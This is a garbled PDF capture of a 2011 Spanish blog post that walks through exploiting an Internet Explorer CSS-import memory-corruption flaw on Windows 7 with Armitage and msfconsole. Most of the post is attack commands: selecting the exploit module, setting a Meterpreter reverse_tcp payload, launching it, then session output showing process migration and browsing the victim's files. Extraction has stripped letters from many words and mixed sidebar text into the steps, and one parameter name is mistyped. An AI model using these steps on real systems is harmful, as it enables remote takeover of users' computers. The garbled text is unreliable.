HackNode_ Uso de Armitage Metasploit para Windows 7.pdf

02/03/12

HackNode: Uso de Armitage Metasploit para Windos 7

Compartir  Informar sobre mal uso

Siguiente Siguie nte blog» blog» Cr Crear ear un blog blog  Acceder 

HackNode You can hack some stuff too!

viernes 28 de enero de 2011

Tie Tie Updae

Uo de Amiage Meaploi paa Windo 7 El s iguiente video video muestra como ut ilizar Armitage para ejecutar c ódigo arbitrario arbitrario en un sistema Windows 7. Esta es la descripción del módulo utilizado para el exploit:

This module exploits a memory c orru orruption ption vulnerab vulnerability ility within Microsoft\’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. reused. This leads t o arbitrary arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions.

Segidoe

02/03/12

HackNode: Uso de Armitage Metasploit para Windos 7

Paicipa en ee iio Google Fiend Connec

Achio de l blog ► 2012 (1)  2011 (23) ► agosto (5) ►  julio (2) ►  junio (2) ► mayo (1) ► marzo (4)

 Ahora, si queremos realizar el mismo ataque utilizando msfconsole, es muy fácil.

► febrero (4) En Back track 4 R2, nos ubicamos en el directorio framework3 (Metasploit F ramework 3: 1

cd /pentest/exploits/framework3

 enero (5) ?

E iniciamos la consola de Metasploit: 1   ./msfconsole

?

Luego ejecutamos el siguiente comando para seleccionar el exploit: 1

use windows/browser/ms11_xxx_ie_css_import

?

Encontrada una falla que afecta todas las versione... Uso de Armitage Metasploit para Windows 7 Metasploit Meterpreter  Cheat Sheet Reference

02/03/12

HackNode: Uso de Armitage Metasploit para Windos 7

Twitt Metasploit Plugin en Ubuntu

Definimos el parámetro SRVHOST con nuestra dirección IP: 1

set SVRHOST 12.16.1.23

?

Bypass de Windows UAC en Metasploit

Definimos el parámetro URIPATH: 1

set URIPATH /

?

► 2010 (2)

Seleccionamos el PAYLOAD a utilizar: 1

set PAYLOAD windows/meterpreter/reverse_tcp

?

Dao peonale DakOpeao 

Definimos el parámetro LHOST con nuestra dirección IP: 1

set SVRHOST 12.16.1.23

?

Lanzamos el exploit: 1   exploit

?

 Alpha_Geek/Daddy/Ethical_Ha cker/InfoSec_Professional/Co mic_Fanboy/Clone_Trooper  Ver todo mi perfil

El resultado debe mostrar lo siguiente:

[*] 192.168.1.100:43487 Receied ee f "/" [*] 192.168.1.100:43487 Sedig id/be/11__ie_c_i  ediec [*] 192.168.1.100:43487 Receied ee f "/Dd.h" [*] 192.168.1.100:43487 Sedig id/be/11__ie_c_i  HTML [*] 192.168.1.100:43487 Receied ee f "/geeic-1296233659. d" [*] 192.168.1.100:43487 Sedig id/be/11__ie_c_i  .NET DLL [*] 192.168.1.100:43494 Receied ee f "/\356\200\240\341\20 1\232\356\200\240\341\201\232\356\200\240\341\201\232\356\200\240\ 341\201\232"

02/03/12

HackNode: Uso de Armitage Metasploit para Windos 7

[*] 192.168.1.100:43494 Sedig id/be/11__ie_c_i  CSS [*] Sedig age (749056 be)  192.168.1.100 [*] Meeee ei 1 eed (192.168.1.100:4444 -> 192.168.1. 100:37030) a Fi Ja 28 17:54:43 +0100 2011 [*] Sei ID 1 (192.168.1.100:4444 -> 192.168.1.100:37030) ce ig IiiaARSci 'igae -f' [*] Ce ee ce: iee.ee (3668) [*] Saig a ead.ee h ce... [*] Migaig i ce ID 2204 [*] Ne ee ce: ead.ee (2204)

 A partir de ese momento ya se tiene activa la sesión en el equipo víctima, con los mismos permisos que el usuario afectado y por eso la permanente necesidad de utilizar el s istema con permisos restringidos, sobre todo si se trata de un entorno corporativo.

f ei(11__ie_c_i) > ei -L Acie ei =============== Id

Te

Ifai

Ceci

--

----

-----------

----------

1

eeee 86/i32

bacb\Jh  @ BLACKBOX

192.168.1.1

7:4444 -> 192.168.1.32:49161

f ei(11__ie_c_i) > ei 1

Ya podremos utilizar la sesi ón establecida en el equipo víctima, por ejemplo para realizar un listado de archivos:

02/03/12

HackNode: Uso de Armitage Metasploit para Windos 7

eeee >  Liig: C:\Ue\Jh\Dce ================================ Mde

Sie

Te

La dified

Nae

----

----

----

-------------

----

40555/-- -

0

di

M Ja 17 01:59:54 -0500 2011

.

40777/ 

0

di

M Ja 17 01:59:54 -0500 2011

..

40777/ 

0

di

M Ja 17 01:58:39 -0500 2011

M M

0

di

M Ja 17 01:58:39 -0500 2011

M P

0

di

M Ja 17 01:58:39 -0500 2011

M V

402

fi

M Ja 17 01:59:54 -0500 2011

de

ic 40777/  ice 40777/  ide 100666/-- .ii

Es neces ario tener en cuenta que la mayoría de los antivirus ya detectan el ex ploit utiliz ado por Metasploit (el original) por lo que si la víctima ingresa a la URL con el antivirus habilitado es posible que este detecte el ataque. Publicado por DarkOperator en 22:14 1 peona

Entrada más reciente

Página principal

Entrada antigua

02/03/12

HackNode: Uso de Armitage Metasploit para Windos 7

Plantilla Awesome Inc.. Con la tecnología de Blogger .